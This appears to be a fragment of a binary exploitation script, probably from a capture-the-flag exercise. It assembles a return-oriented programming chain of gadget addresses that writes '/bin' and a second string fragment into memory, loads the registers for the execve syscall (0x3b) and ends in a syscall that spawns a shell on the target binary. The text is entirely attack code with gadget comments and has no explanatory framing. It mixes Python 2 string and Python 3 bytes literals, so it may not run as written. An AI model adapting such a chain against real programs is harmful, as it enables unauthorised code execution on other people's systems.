payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x4870ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f)+p64(0x4870b1)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x41f0cb)
# 0x000000000041f0cb: pop rax; ret; 
payload += p64(0x0)+p64(0x44ee7c)
# 0x000000000044ee7c: xchg edx, eax; ret 6; 
payload += p64(0x4017d3)+"\x00"*6
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x487070)+p64(0x41f0cb)
# 0x000000000041f0cb: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40eb07)
# 0x000000000040eb07: syscall; 
payload += b''
